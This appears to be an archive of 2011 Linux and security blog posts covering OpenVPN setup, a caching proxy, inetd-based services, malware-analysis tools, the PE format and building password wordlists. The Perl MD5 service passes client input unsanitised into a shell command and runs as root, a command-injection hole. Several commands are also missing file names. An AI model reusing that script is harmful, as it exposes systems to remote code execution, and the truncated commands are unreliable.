Sat May 28 20:53:16 2011 Initialization Sequence Completed

To test your VPN connection, you can use the ping utility.

---+++Using openvpn with certificates.+++---

Server setup:
  1. Copy scripts for handling certificates to /etc/openvpn directory. # cp -r /usr/share/doc/openvpn/examples/easy-rsa /etc/openvpn
  2. Go to the scripts dir. # cd /etc/openvpn/easy-rsa/2.0
  3. Modify the "vars" file. The variables that you want to modify are at the bottom of the file. These include KEY_COUNTRY, KEY_PROVINCE etc.
  4. After modifying the vars file, issue this command on the file. # source ./vars
  5. Clean up older keys. # ./clean-all
  6. Create CA key and certificate. # ./build-ca
  7. Create the openvpn server's certificate and key. # ./build-key-server openvpn_server
  8. Create client keys and certificates. # ./build-key client1
  9. Create dh key. # ./build-dh # this can take 2-4 minutes to create. Move your mouse around and be patient :)
  10. Go to the keys directory. # cd keys
  11. Copy the dh1024.pem, ca.crt, openvpn_server.crt and the openvpn_server.key files to /etc/openvpn/ directory
  12. Let's create our server config file:
tls-server # this would be the server in tls mode
proto udp # protocol to use. Either tcp or udp
port 1194 # port num
dev tun # can be either tun or tap. Tun is simpler to set up
ifconfig <server-vpn-ip> <client-vpn-ip> # the first is the desired IP for our server's virtual interface, the other is the peer's

ca /etc/openvpn/ca.crt
cert /etc/openvpn/openvpn_server.crt
key /etc/openvpn/openvpn_server.key
dh /etc/openvpn/dh1024.pem

cipher AES-128-CBC # encryption cipher to use

user nobody # drop privileges to this user
group nobody # same as above
verb 3 # logging level
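An optional hardening step, not part of the original setup: OpenVPN's tls-auth option adds an HMAC signature so unauthenticated packets are dropped before the TLS handshake even starts. Assuming you generate a shared ta.key on the server with `openvpn --genkey --secret ta.key` and copy it to each client, you would add to the server config:

```
tls-auth /etc/openvpn/ta.key 0 # direction 0 on the server
```

and the matching `tls-auth /home/user/.openvpn/ta.key 1` line on the client.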
Client setup:

  1. Copy the ca.crt, client1.crt and the client1.key files to the client
  2. Create its config file:

tls-client # this would act as client in tls mode
remote <server-public-ip> # the VPN server's real ip
proto udp

port 1194
dev tun
ifconfig <client-vpn-ip> <server-vpn-ip> # notice the change here

ca /home/user/.openvpn/ca.crt
cert /home/user/.openvpn/client1.crt
key /home/user/.openvpn/client1.key

cipher AES-128-CBC
user nobody
group nobody
verb 3
Again, starting the server and client takes the same command, but you must have root privileges. Once you are root, you can start either end like so: # openvpn --config /etc/openvpn/openvpn.conf

Once the connection is established both the server and client terminal windows should give some details similar to this:

Sat May 28 20:53:16 2011 Initialization Sequence Completed

To test your VPN connection, you can use the ping utility and ping each node.


If you want to revoke client keys:
# ./revoke-full client1

This adds client1 to a sort of blacklist that no longer allows them to connect to our VPN. The file that houses this blacklist is crl.pem. Create a hard link (ln without the -s option) to this file in the /etc/openvpn/ directory.
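Why a hard link and not a copy? Both directory entries point at the same inode, so when easy-rsa rewrites crl.pem in place, the /etc/openvpn/crl.pem link is updated automatically. A quick demonstration with throwaway files:

```shell
# demonstrate hard-link behaviour: writes through one name are
# immediately visible through the other, because both names share
# the same inode
rm -f /tmp/crl.pem /tmp/crl-link.pem
printf 'revoked: client1\n' > /tmp/crl.pem
ln /tmp/crl.pem /tmp/crl-link.pem      # hard link (ln without -s)
printf 'revoked: client2\n' >> /tmp/crl.pem
cat /tmp/crl-link.pem                  # shows both entries
```

A plain copy would have gone stale the moment the CRL was next updated.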

You also need to add this line to the server's configuration file. It causes the server to check its revocation list whenever a client tries to establish a connection:

crl-verify /etc/openvpn/crl.pem

I noticed that when a revoked client tried to connect to the vpn, not only was it denied service, the VPN server also shut down. It seems that when openvpn shuts the connection down, it tries to reinitialize its tun interface but fails, because in our config file we dropped our privileges to nobody. This issue is quickly resolved by commenting out or deleting the user and group lines in the server config file.


Monday, May 23, 2011

Vicompress: http proxy server

Vicompress is an http proxy server with the ability to cache requests in memory. It has a small footprint, but because it caches contents in memory, it can eventually use up a lot of memory. It has decent log statistics capabilities too, and outputs them to an html-formatted page. Most important to me, setup and configuration are quite simple.


1. Download the installation package from the ViSolve website. In my case, I downloaded the .deb version of the package.

2. To install i used the command: # dpkg -i package-name


For details on all configuration parameters, go here

The default configuration will do just fine, but it's useful to learn its parameters.
Here is a snapshot of my vicompress.conf configuration file:

listen 8080
enable_compression yes
enable_caching yes
cache_memory 200
max_cacheditem_size 10000
cache_expires 2
enable_dns_caching yes
dns_expires 2
user nobody
rotatesize 10
logformat squid
enable_debug no
accesslog /usr/local/vicompress/log/accesslog
errorlog /usr/local/vicompress/log/errorlog
errorpage /usr/local/vicompress/etc/errorpage.html
logstats /usr/local/vicompress/logstats

To start the server: # /usr/local/vicompress/bin/ start

A statistics report is usually generated every hour. You can speed this process up by issuing these commands:

# cd /usr/local/vicompress
# ./bin/update_log_stats log/accesslog logstats

To view the report, issue: # firefox /usr/local/vicompress/logstats/statsindex.html
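If the hourly report is too stale, a cron entry can regenerate it more often. A sketch for /etc/crontab, assuming the paths from the config above (every 15 minutes):

```
*/15 * * * * root cd /usr/local/vicompress && ./bin/update_log_stats log/accesslog logstats
```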


Saturday, May 14, 2011

Inetd and perl

Just a quick, simple trick that can help you set up servers quickly and easily. You don't have to know a lot about programming either, but it helps to know what Inetd is in linux.

Inetd, per its manpage, is known as an internet superserver. All those big words aside, it can basically listen on a given port for you and, when a connection comes in, call the appropriate application to handle it. It turns out that you can use Inetd's sockets for network communication instead of programming your own. What that means is that inetd can listen on port 80, and when a connection comes in on that port, it can run a shell script that simply sends back some text or html tags. Inetd connects the socket to the called program's standard input and standard output, so whatever the program reads comes from the client and whatever it prints goes back to the client.

Let's quickly demonstrate this with a bash script.

#!/bin/bash
echo "Hello World"

Now save that script to a file (hypothetical name: and give the file executable permissions.
# chmod 555

Now configure /etc/inetd.conf as follows

# hypothetical script name (; the last fields are the program path and its argv[0]
http-alt stream tcp4 nowait root /root/

Now save the file.

Run the inetd daemon
# /etc/init.d/inetutils-inetd start

Now netcat to port 8080 (which is what the http-alt service maps to) and you should receive a response:

root@bt~#: nc localhost 8080
Hello World

All should work well if done right. Now, to get a little more fancy, I've put together a perl script that takes an input and returns the MD5 hash of that input (an MD5 hashing service, if you will).
#!/usr/bin/perl -w

# A simple inetd socket server.

use strict;

# unbuffer STDOUT so prompts reach the client immediately
my $old_fh = select(STDOUT);
$| = 1;
select($old_fh);

print "++ MD5 pass generator ++\n\n";
print "Type 'exit' at any time to quit\n";
print "Enter string to be hashed: ";

while ( my $line = <STDIN> ) {
    $line =~ s/\r?\n$//;
    if ( $line =~ /^exit$/ ) {
        die "shutting down\n";
    }
    # do your processing here!
    $line = `echo -n $line | openssl md5`;
    print "$line\n";
    print "Enter string to be hashed: ";
}
Save the perl script to a file (e.g. and chmod 555 your file.
Start the inetd daemon as shown above and use netcat to connect to the service :)
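Since the inetd trick is just stdin/stdout plumbing, you can sanity-check a handler locally by piping into it, with no inetd involved. The core of the script above boils down to:

```shell
# hash a string the same way the perl script does; the digest of
# "hello" is the well-known 5d41402abc4b2a76b9719d911017c592
# (the "(stdin)= " prefix varies with the openssl version)
printf '%s' hello | openssl md5
```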

Backtrack 5 is out

Backtrack 5 is out, folks. Head on over to the backtrack website to get yourself a copy of this well-put-together masterpiece. There are 32 and 64 bit versions available now, as well as the classic KDE-styled version and a new GNOME version, which puts you in an Ubuntu-like environment. I've decided to go with the Gnome version, as I'm used to Ubuntu and it was refreshing to use something other than the classic desktop environment. All versions should have the same tools and capabilities, so it's all a matter of preference.

What are you waiting for? Get your copy here.

Wednesday, April 13, 2011

Useful malware analysis tools

I was reading some articles from an e-magazine covering basic malware analysis techniques. Why would anyone (the average person) want to do this? Maybe some people just have a lot of time on their hands or, like me, just want to know how everything works. It is very important for anti-virus vendors to do malware analysis in order to produce signatures that identify the malware during scans. If you have some time on your hands, I suggest you check out some of the articles, including the ones relating to malware analysis.


Regshot: This tool, as its name says, takes a snapshot of the registry. It basically gives you a baseline of what the registry looks like at that point in time. Given that baseline, you can then execute the suspicious executable and take another registry snapshot. You are then able to compare both snapshots using regshot's compare feature to find out what keys have been added, modified or deleted. It has the option of outputting its results as a text file or a nicely formatted HTML file.

Regmon: Like regshot, regmon is a registry utility, but it operates in a slightly different manner. It has the ability to give real-time analysis of what keys (and their locations) currently running processes are accessing. It lets you know whether a process is querying information, creating new keys, setting values, etc. Just before you execute the malware, you can have regmon running in the background capturing this information. When the program has executed, you can stop regmon's capture and perform your analysis. You will notice that while regmon was capturing data, it captured information not only for the malware process you are investigating, but also for other processes that were accessing the registry. Thankfully, there is a nice filter feature that lets you filter the captured data by process name. Although the filter is very limited, it is still beneficial to have. You can also look into another tool called procmon, which is the current successor of regmon and filemon. It has the same capabilities as regmon and many more options. However, regmon still has its place and is simple to use and learn.

Filemon: This tool works in a similar fashion to regmon, but with files. It monitors processes that access files on the disk and logs their actions (read, write, query, delete, etc.) and whether they were successful or not. Like regmon, just before you execute the malware, you can have filemon running in the background capturing information. When the target program has executed, you can stop filemon's capture and perform your analysis.

Wireshark and Netcat: It is known that some malware tends to replicate itself over the network. Some may try to covertly download software or log onto some IRC channel to query its commands (google: botnet). Such malware is coded to work covertly, so while you're sitting at your desktop, you would not see any indication that anything is going on. Wireshark can help us answer the why, where, what, when and who questions. Why is the malware connecting out to port 4444; where is the malware trying to connect to; when or at what intervals does the malware initiate any type of network traffic; what is the malware trying to accomplish; who is involved (source IPs, mac addresses, domains etc.). Netcat can be set up to intercept this traffic in a proxy mode and also be used to interact with and respond to services and requests.

Netstat and tasklist: Before analyzing any piece of malware, having a baseline is vital. You are gonna need an idea of what the system looked like before and after the malware was run. Running netstat before running the executable gives us a baseline of open network sessions and listening ports, while the tasklist utility gives us a list of currently running processes. Tools you can use as well are sysinternals' process explorer and tcpview.
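The baseline idea boils down to snapshot-before, snapshot-after, diff. Here is the pattern sketched with stand-in files and POSIX tools (on the Windows box you would redirect netstat/tasklist output to files the same way and compare with fc):

```shell
# fake "before" and "after" process snapshots (already sorted,
# as comm requires)
printf 'explorer.exe\nsvchost.exe\n' > /tmp/baseline.txt
printf 'explorer.exe\nmalware.exe\nsvchost.exe\n' > /tmp/after.txt
# comm -13 prints lines unique to the second file: anything that
# appeared only after the sample ran
comm -13 /tmp/baseline.txt /tmp/after.txt
```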

Debugger, Ollydbg: To really get in depth with exactly what the executable is doing, you will have to use a debugger to step through the opcodes and system calls. Using a debugger is not easy for most and can take a little getting used to. However, to be good at malware analysis, you cannot escape learning how to use a debugger like IDA Pro or, in my case, Ollydbg.

Virtual environment: To avoid potentially infecting your main system and possibly breaking your Windows OS, you will definitely want to perform most, if not all, of your analysis in a virtual environment. Virtual machines also provide a mechanism to roll back a host to a snapshot of the system at an earlier time. This allows us to restore the state of a system to a point just before an event occurred (say the malware caused the OS to no longer start up) within minutes. There are quite a few options available for virtualization, but I myself use VirtualBox. Remember to check the system requirements of these technologies before installing on your old Pentium III laptop with 256 MB of RAM.

PE tools: Sometimes malware may be packed by common packer tools like UPX. The benefit of using a packer on an EXE file is that it compresses the executable. However, by doing so, the original exe's form is changed. What you get is an exe within an exe: the outer layer is the packer's decompression code, which decompresses the internal exe in memory and then executes it. The additional benefit (to the malware author) is that it makes debugging the packed executable a pain in the butt. In order to properly debug the functionality of the packed executable, it must first be decompressed. Tools like PEiD can help us identify a packed executable's packer. Knowing this, we can in some cases use the same packer to unpack the executable back to its original form. Another PE tool I use is LordPE, which allows for modifying the PE headers of binary executables.

These are just some tools that can be utilized in the malware analysis process. I encourage you to do your own research and look up the malware analysis articles on the website. The articles are available in PDF format and are a little difficult to link to directly :(


Wednesday, March 23, 2011

Windows and its PE file structure

I'll start this post off by asking a question: WTF is a PE file? A PE file is something we use on a day-to-day basis when we use our computer systems. The files that have the ".exe" and ".dll" extensions are what we refer to as PE (Portable Executable) files. A PE file contains one of the most complex file structures I've ever seen, and it's very important to understand most, if not all of it, if you want to modify the binary file or become a reverse-engineer. Because there are so many structures, I can't go through them all (I don't even understand 50% of them), but I will try to focus on the most common ones.

For a visual of what the structure looks like, go to Google Images and search "PE file format".
Here is one that i found and usually reference: link

[ MZ header] - "hex bytes: 4d 5a"
[ Dos stub ] - "This program cannot be run in dos mode"
[PE header] - "Hex bytes: 50 45 00 00"
[optional header]
[Data directory] - "Structure of important locations such as import table, export table, etc."
[Section table header] - "array of structures describing the properties of each section."
[section 1]
[section 2]
[section n]

Every PE file should contain the above information. The very first two bytes of the file should be "4d 5a", which is "MZ" in ASCII. This indicates the start of the DOS header. At position 0x3c in the DOS header is a dword (4 bytes) that indicates the offset of the start of the PE header. Directly after this should be the DOS stub, which basically prints a string saying that this program cannot be run in DOS mode, or something similar.

Following the dword offset at position 0x3c takes you to the start of the PE header, which should contain the hex bytes "50 45 00 00". Other useful information contained here includes the machine type (i386, i686, etc.), the number of sections and the size of the optional header.

24 bytes from the PE header starts the Optional header. This structure is in every PE file and isn't really optional, as the name may suggest. It contains many relevant fields that the windows loader needs in order to load the file correctly into memory.

The data directory is a listing of the locations of important data such as the import tables (when you use functions from windows DLLs, you have to import them) and export tables.

The section header is an array of structures containing the properties of each section. This information includes its name, its size on disk and in memory, and its location.

The last sections will house the individual sections referenced in the section header. You can use the information in the section header to find the relevant offsets and size of each section.
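The e_lfanew lookup described above can be done by hand with od. This sketch fabricates a minimal 64-byte DOS header (just the "MZ" magic, padding, and a dword 0x00000080 at offset 0x3c) and reads the PE-header offset back out; on a real EXE you would point od at the file itself. It assumes a little-endian machine, which is how od's u4 type reads the bytes on x86:

```shell
# build a fake DOS header: 'MZ', 58 padding bytes, then the
# little-endian dword 0x00000080 (octal \200) at offset 0x3c
printf 'MZ' > /tmp/fake.exe
dd if=/dev/zero bs=1 count=58 >> /tmp/fake.exe 2>/dev/null
printf '\200\000\000\000' >> /tmp/fake.exe
# read 4 bytes at offset 60 (0x3c) as an unsigned 32-bit integer
od -An -j 60 -N 4 -t u4 /tmp/fake.exe | tr -d ' '   # prints 128
```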

Sunday, January 30, 2011

Custom wordlist

Here are two ways to create a custom wordlist with backtrack 4 R2.


Way #1:

# wget -r -l 3

'-r' recurse
'-l' recursion depth level

# -o wordlist.lst /root/


Way #2

ruby cewl.rb --depth 3 -w ~/wordlist.lst
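After wget has mirrored a site, you can also roll a rough wordlist yourself with standard tools. A sketch against a stand-in HTML file (cewl does this far more cleverly; this just shows the core idea of splitting on non-letters, dropping short tokens, and deduping):

```shell
# stand-in for a page wget saved; point this at your mirrored
# files instead of /tmp/page.html
printf '<p>Admin password reset portal</p>\n' > /tmp/page.html
# split on anything that isn't a letter, keep words of 4+ chars,
# sort and dedupe into a wordlist
tr -cs 'A-Za-z' '\n' < /tmp/page.html | awk 'length($0) >= 4' | sort -u
```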